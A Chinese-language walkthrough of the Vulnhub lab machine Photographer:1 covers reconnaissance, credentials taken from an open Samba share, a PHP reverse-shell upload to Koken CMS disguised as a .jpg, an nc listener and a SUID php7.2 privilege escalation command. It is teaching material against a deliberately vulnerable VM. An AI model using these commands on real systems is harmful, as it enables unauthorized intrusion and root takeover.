Vulnhub篇Photographerr:1

admin 2020年8月12日09:49:18评论246 views字数 946阅读3分9秒阅读模式

点击蓝字



关注我们


0x00



靶机信息





靶机:Photographerr:1

难度:中

下载:https://www.vulnhub.com/entry/photographer-1,519/

0x01



信息收集





靶场网段:192.168.12.0/24

Nmap扫描靶场网段,寻找目标靶机IP以及相关端口服务

Vulnhub篇Photographerr:1

发现3个疑似IP,尝试访问这些IP的Web服务来快速判断哪个是靶机IP

Vulnhub篇Photographerr:1

访问192.168.12.142成功,根据网页内容确定是这个IP,接下来获取端口服务信息

Vulnhub篇Photographerr:1

开放端口:80,139,445,8000

刚刚已经访问过80端口的页面了,静态页面,暂时没有找到有价值的地方

访问8000端口,发现是一个Koken的CMS网站 版本0.22.24

Vulnhub篇Photographerr:1
Vulnhub篇Photographerr:1

扫下目录

Vulnhub篇Photographerr:1

访问admin后台页面

Vulnhub篇Photographerr:1
Vulnhub篇Photographerr:1

后台账号格式为邮箱,因为不知道邮箱,也没有办法去进行爆破,在exp库中找到koken版本0.22.24的上传漏洞

Vulnhub篇Photographerr:1

遗憾的是这个上传漏洞是后期的,现在需要先登入后台,才可以利用这个漏洞

继续探索其他端口,使用enum4linux探索445端口

Vulnhub篇Photographerr:1

Samba服务,连接上去看看有没有上面信息

Vulnhub篇Photographerr:1

匿名连接上去发现两个文件,一个txt文本一个压缩包

Vulnhub篇Photographerr:1

Txt文本内是一封邮件,这里我们就得到了邮箱号,密码应该是babygirl

尝试登入一下

Vulnhub篇Photographerr:1

登入成功,接下来就可以利用上传漏洞了

0x02



漏洞利用





使用Kali自带的php反弹脚本来进行利用

Vulnhub篇Photographerr:1
cp /usr/share/webshells/php/php-reverse-shell.php ~/bachangshijie.php.jpg

先copy出来,然后修改接收反弹的IP和端口

Vulnhub篇Photographerr:1

接下来上传,使用burp修改后缀名

Vulnhub篇Photographerr:1

上传完成

Vulnhub篇Photographerr:1

在content中找到我们刚刚上传的,并访问,kali设置监听

nc -lvnp 1100
Vulnhub篇Photographerr:1

成功获取到shell

0x03



提权





获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
Vulnhub篇Photographerr:1

查看suid权限的程序文件

find / -perm -u=s -type f 2>/dev/null
Vulnhub篇Photographerr:1

有一个php7.2,那就用他来提权

/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
Vulnhub篇Photographerr:1

至此通关







Vulnhub篇Photographerr:1

扫二维码|关注我们


微信号|靶机世界

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月12日09:49:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub篇Photographerr:1https://cn-sec.com/archives/86417.html

发表评论

匿名网友 填写信息